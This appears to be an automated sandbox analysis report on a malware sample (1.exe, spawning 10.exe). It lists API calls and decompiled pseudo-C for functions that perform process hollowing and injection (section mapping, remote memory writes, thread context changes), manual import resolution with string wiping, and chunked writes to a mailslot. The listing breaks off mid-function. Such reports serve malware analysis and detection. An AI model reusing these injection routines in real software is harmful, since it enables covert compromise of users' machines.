  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: 10.exe Analysis ID: 59085

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:0CEEE3CE1679E892A20AEBA2258A928C
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:59085
Initial sample SHA 256:20B4184C27C3F6AC557FBD8C3750EE6C8581D464D118353A4CE9405D104CFB5F
Initial sample name:1.exe

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime
Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
